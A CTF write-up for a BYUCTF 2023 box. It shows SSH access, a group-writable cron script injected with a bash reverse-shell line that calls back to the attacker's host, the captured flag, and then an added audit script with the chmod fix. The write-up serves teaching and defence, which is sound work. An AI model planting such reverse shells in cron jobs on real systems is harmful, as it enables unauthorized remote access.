Tags: mj0ln1r invaders0x1 pentest shell 

# MI6configuration 3

+ Using the james_bond credentials, I tried to log in over SSH.

```sh
┌─[attacker@parrot]─[~]
└──╼ $ssh james_bond@192.168.0.133
The authenticity of host '192.168.0.133 (192.168.0.133)' can't be established.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.133' (ECDSA) to the list of known hosts.
james_bond@192.168.0.133's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-208-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Sat May 6 21:50:34 2023
$ ls
james_bond q Shared
$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Apr 17 15:43 .
drwxr-xr-x 23 root root 4096 Apr 17 15:40 ..
dr-x------ 2 james_bond root 4096 Apr 17 22:01 james_bond
dr-x------ 2 q root 4096 May 3 10:27 q
dr-xr-x--- 2 q agents 4096 May 3 10:27 Shared
$ id
uid=1002(james_bond) gid=1003(james_bond) groups=1003(james_bond),1002(agents)
$ cd Shared
$ ls -la
total 12
dr-xr-x--- 2 q agents 4096 May 3 10:27 .
drwxr-xr-x 5 root root 4096 Apr 17 15:43 ..
-rwxrw---- 1 q agents 168 May 3 10:27 update.sh
$

```

As we can see, there are 3 folders in total in `home`. The `Shared` folder is accessible to `q` and the `agents` group. The `id` command shows that `james_bond` is a member of the `agents` group, so we `cd` into the **Shared** folder. In it, `update.sh` is owned by `q` and can be read and written by the `agents` group. Looking at `update.sh`, it contains this:

```sh
$ cat update.sh
#!/bin/bash
#This command will run every two minutes and scan for running processes
#Doing so will protect us from being hacked
#Please do not change this file
ps -aux
$
```

We can add a payload to `update.sh`, which will be executed as the user `q` every 2 min.

Bash reverse shell payload: `bash -i >& /dev/tcp/192.168.0.110/8080 0>&1`

```sh
$ cat update.sh
#!/bin/bash
#This command will run every two minutes and scan for running processes
#Doing so will protect us from being hacked
#Please do not change this file
#ps -aux
bash -i >& /dev/tcp/192.168.0.110/8080 0>&1

$
```

And started a listener on port 8080 on my parrot machine. After 2 min I got a reverse shell on the `q` machine.

```sh
┌─[attacker@parrot]─[~]
└──╼ $nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.0.110] from (UNKNOWN) [192.168.0.133] 44932
bash: cannot set terminal process group (982): Inappropriate ioctl for device
bash: no job control in this shell
q@MI6:~$ ls
ls
flag3.txt
q@MI6:~$ cat flag3.txt
cat flag3.txt
byuctf{cronjobzz}
q@MI6:~$

```

> `Flag 3 : byuctf{cronjobzz}`
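
The root cause is a cron-run script that a group other than its owner can write to (`-rwxrw----`, owner `q`, group `agents`). As an added example that is not part of the original writeup, this audit reads a crontab and flags such scripts. It assumes GNU `stat` and user-crontab syntax; the function names and the sample crontab line are constructed.

```shell
#!/bin/sh
# Added example (not from the writeup). Assumes GNU stat and user-crontab
# syntax: five time fields, then the command.

# Succeeds if the path's mode grants write to group or other (mask 022).
loosely_writable() {
    mode=$(stat -c '%a' "$1") || return 2
    [ $(( 0$mode & 022 )) -ne 0 ]
}

# Print the first word of each job's command; skips comments and env lines.
cron_commands() {
    awk '!/^[[:space:]]*#/ && NF >= 6 { print $6 }'
}

# Read a crontab on stdin and report each script a non-owner could alter,
# either directly or by replacing it inside a loosely writable directory.
# Returns 1 if anything was flagged. Paths containing spaces are not handled.
audit_crontab() {
    rc=0
    for f in $(cron_commands); do
        [ -f "$f" ] || continue
        if loosely_writable "$f"; then
            echo "RISK $f mode=$(stat -c '%a owner=%U group=%G' "$f")"
            rc=1
        fi
        if loosely_writable "$(dirname "$f")"; then
            echo "RISK $(dirname "$f") is a group/world-writable directory"
            rc=1
        fi
    done
    return $rc
}

# Constructed sample reproducing the permissions from the listing above.
demo() {
    d=$(mktemp -d) || return 1
    mkdir "$d/Shared" && chmod 750 "$d/Shared"
    printf '#!/bin/bash\nps -aux\n' > "$d/Shared/update.sh"
    chmod 760 "$d/Shared/update.sh"     # -rwxrw---- as on the page
    job="*/2 * * * * $d/Shared/update.sh"
    echo "$job" | audit_crontab && echo "before fix: clean" || echo "before fix: flagged"
    chmod 750 "$d/Shared/update.sh"     # remove group write
    echo "$job" | audit_crontab && echo "after fix: clean" || echo "after fix: flagged"
    rm -rf "$d"
}
demo
```

Removing group write (`chmod 750`, or `chmod g-w`) is the fix the second run confirms; only the account the job runs as should be able to modify the script and its directory.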

# [Original Writeup](https://themj0ln1r.github.io/posts/byuctf23)